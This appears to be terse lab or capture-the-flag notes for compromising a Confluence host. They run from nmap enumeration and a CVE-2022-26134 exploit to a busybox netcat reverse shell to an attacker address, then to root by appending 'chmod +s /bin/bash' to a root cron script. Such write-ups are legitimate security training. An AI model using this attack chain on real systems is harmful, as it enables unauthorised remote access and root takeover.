Enum
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
Services
22 ssh
8090 confluence
Public exploit
Try at least 4 exploit pocs before moving on.
ā CVE-2022-26134 git:(main) python3 CVE-2022-26134.py http://192.168.245.41:8090 whoami
Confluence target version: 7.13.6
confluence
ā CVE-2022-26134 git:(main)
YOOO
ALWAYS USE BUSYBOX NETCAT
python3 CVE-2022-26134.py http://192.168.245.41:8090 'busybox nc 192.168.45.171 22 -e sh'
Local
881eb6ca6cbaf31eb219c17c23d10ed2
Ran pspsy found backup
2024/08/11 16:41:01 CMD: UID=0 PID=3061 | /usr/sbin/CRON -f -P
2024/08/11 16:41:01 CMD: UID=0 PID=3062 | /bin/bash /opt/log-backup.sh
2024/08/11 16:41:01 CMD: UID=0 PID=3063 | /bin/bash /opt/log-backup.sh
2024/08/11 16:41:01 CMD: UID=0 PID=3065 | tar -czf /root/backup/log_backup_20240811164101.tar.gz /root/backup/log_backup_20240811164101
2024/08/11 16:41:01 CMD: UID=0 PID=3066 | tar -czf /root/backup/log_backup_20240811164101.tar.gz /root/backup/log_backup_20240811164101
2024/08/11 16:41:01 CMD: UID=0 PID=3067 |
2024/08/11 16:41:01 CMD: UID=0 PID=3068 |
2024/08/11 16:41:01 CMD: UID=0 PID=3069 |
2024/08/11 16:41:01 CMD: UID=0 PID=3070 | find /root/backup -name log_backup_* -mmin +5 -exec rm -rf {} ;
2024/08/11 16:41:06 CMD: UID=0 PID=3071 |
We can echo into it
echo "chmod +s /bin/bash" >> log-backup.sh
we wait and can exec!
/bin/bash -p
proof:
4b230a2820e2be2549a9d3469cd70b11